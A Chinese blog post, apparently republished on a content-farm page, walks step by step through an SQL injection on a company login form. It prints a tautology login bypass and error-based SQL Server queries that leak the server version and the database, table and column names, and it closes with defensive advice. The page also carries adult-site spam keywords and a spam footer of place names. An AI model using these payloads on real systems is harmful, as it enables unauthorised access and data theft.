久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

SQL注入全過(guò)程的深入分析是怎樣的

共計(jì) 2374 個(gè)字符,預(yù)計(jì)需要花費(fèi) 6 分鐘才能閱讀完成。

這篇文章將為大家詳細(xì)講解有關(guān) SQL 注入全過(guò)程的深入分析是怎樣的,文章內(nèi)容質(zhì)量較高,因此丸趣 TV 小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

分析了 SQL 注入全過(guò)程,具體如下:

初步注入 – 繞過(guò)驗(yàn)證,直接登錄

公司網(wǎng)站登陸框如下:

可以看到除了賬號(hào)密碼之外,還有一個(gè)公司名的輸入框,根據(jù)輸入框的形式不難推出 SQL 的寫法如下:復(fù)制代碼 代碼如下:
SELECT * From Table WHERE Name= XX and Password= YY and Corp= ZZ

我發(fā)現(xiàn)前兩者都做一些檢查,而第三個(gè)輸入框卻疏忽了,漏洞就在這里!注入開始,在輸入框中輸入以下內(nèi)容:

用戶名亂填,密碼留空,這種情況下點(diǎn)擊登錄按鈕后竟然成功登錄了。

我們看一下最終的 SQL 就會(huì)找到原因:復(fù)制代碼 代碼如下:
SELECT * From Table WHERE Name= SQL inject and Password= and Corp= or 1=1–

從代碼可以看出,前一半單引號(hào)被閉合,后一半單引號(hào)被“–”給注釋掉,中間多了一個(gè)永遠(yuǎn)成立的條件“1=1”,這就造成任何字符都能成功登錄的結(jié)果。而 Sql 注入的危害卻不僅僅是匿名登錄。

中級(jí)注入 – 借助異常獲取信息

現(xiàn)在我們?cè)诘谌齻€(gè)輸入框中寫入:

‘or 1=(SELECT @@version) –

如下:

后臺(tái)的 SQL 變成了這樣:

SELECT * From Table WHERE Name= SQL inject  and Password=  and Corp= or 1=(SELECT @@VERSION)--

判斷條件變成了 1 =(SELECT @@VERSION),

這個(gè)寫法肯定會(huì)導(dǎo)致錯(cuò)誤,但出錯(cuò)正是我們想要的。點(diǎn)擊登錄后,頁(yè)面出現(xiàn)以下信息:

Conversion failed when converting the nvarchar value Microsoft SQL Server 2008 (SP3) – 10.0.5500.0 (X64) Sep 21 2011 22:45:45Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)on Windows NT 6.1 X64 (Build 7601: Service Pack 1) to data type int.

可怕的事情出現(xiàn)了,服務(wù)器的操作系統(tǒng)和 SQL Server 版本信息竟然通過(guò)錯(cuò)誤顯示出來(lái)。

危害擴(kuò)大 – 獲取服務(wù)器所有的庫(kù)名、表名、字段名

接著,我們?cè)谳斎肟蛑休斎肴缦滦畔ⅲ簭?fù)制代碼 代碼如下:
t or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))–

此時(shí)發(fā)現(xiàn)第三個(gè)輸入框有字?jǐn)?shù)長(zhǎng)度的限制,然而這種客戶端的限制形同虛設(shè),

直接通過(guò) Google 瀏覽器就能去除。

點(diǎn)擊登錄,返回的信息如下:

Conversion failed when converting the nvarchar value master to data type int.

數(shù)據(jù)庫(kù)名稱“master”通過(guò)異常被顯示出來(lái)!依次改變上面 SQL 語(yǔ)句中的序號(hào),

就能得到服務(wù)器上所有數(shù)據(jù)庫(kù)的名稱。

接著,輸入信息如下:復(fù)制代碼 代碼如下:
b or 1=(SELECT top 1 name FROM master..sysobjects where xtype= U and name not in (SELECT top 1 name FROM master..sysobjects where xtype= U))–

得到返回信息如下:

Conversion failed when converting the nvarchar value spt_fallback_db to data type int.

我們得到了 master 數(shù)據(jù)庫(kù)中的第一張表名:“spt_fallback_db”,

同上,依次改變序號(hào),可得到該庫(kù)全部表名。

現(xiàn)在我們以“spt_fallback_db”表為例,嘗試獲取該表中所有的字段名。在輸入框中輸入以下代碼:復(fù)制代碼 代碼如下:
b or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name= spt_fallback_db

于是,得到錯(cuò)誤提示如下:

Conversion failed when converting the nvarchar value xserver_name to data type int.

這樣第一個(gè)字段名“xserver_name”就出來(lái)了,依次改變序號(hào),就能遍歷出所有的字段名。

最終目的 – 獲取數(shù)據(jù)庫(kù)中的數(shù)據(jù)

寫到這里,我們已知通過(guò) SQL 注入能獲取全部的數(shù)據(jù)庫(kù),表,及其字段,為了防止本文完全淪為注入教程,獲取數(shù)據(jù)的代碼就不再描述,而這篇文章的目的也已達(dá)到,SQL 注入意味著什么?意味著數(shù)據(jù)庫(kù)中所有數(shù)據(jù)都能被盜取。

當(dāng)知道這個(gè)危害以后,是否還能有人對(duì) SQL 注入漏洞置之不理?

結(jié)語(yǔ)

關(guān)于安全性,總結(jié)出一下幾點(diǎn):

1. 對(duì)用戶輸入的內(nèi)容要時(shí)刻保持警惕。

2. 只有客戶端的驗(yàn)證等于沒(méi)有驗(yàn)證。

3. 永遠(yuǎn)不要把服務(wù)器錯(cuò)誤信息暴露給用戶。

除此之外,我還要補(bǔ)充幾點(diǎn):SQL 注入不僅能通過(guò)輸入框,還能通過(guò) Url 達(dá)到目的。

2. 除了服務(wù)器錯(cuò)誤頁(yè)面,還有其他辦法獲取到數(shù)據(jù)庫(kù)信息。

3. 可通過(guò)軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。

4. 漏洞跟語(yǔ)言平臺(tái)無(wú)關(guān)。

關(guān)于 SQL 注入全過(guò)程的深入分析是怎樣的就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。

正文完
 
丸趣
版權(quán)聲明:本站原創(chuàng)文章,由 丸趣 2023-07-17發(fā)表,共計(jì)2374字。
轉(zhuǎn)載說(shuō)明:除特殊說(shuō)明外本站除技術(shù)相關(guān)以外文章皆由網(wǎng)絡(luò)搜集發(fā)布,轉(zhuǎn)載請(qǐng)注明出處。
評(píng)論(沒(méi)有評(píng)論)
主站蜘蛛池模板: 桐乡市| 庆云县| 陈巴尔虎旗| 昌图县| 南雄市| 册亨县| 南投县| 喀喇| 九龙坡区| 双峰县| 静安区| 杂多县| 临沧市| 远安县| 依兰县| 夹江县| 仙居县| 万源市| 顺义区| 盈江县| 额尔古纳市| 晋中市| 荣成市| 古蔺县| 库车县| 二手房| 抚顺县| 东丰县| 铁岭市| 集贤县| 同江市| 闽清县| 兰溪市| 明水县| 莫力| 花垣县| 乌拉特中旗| 闵行区| 米易县| 庐江县| 清水县|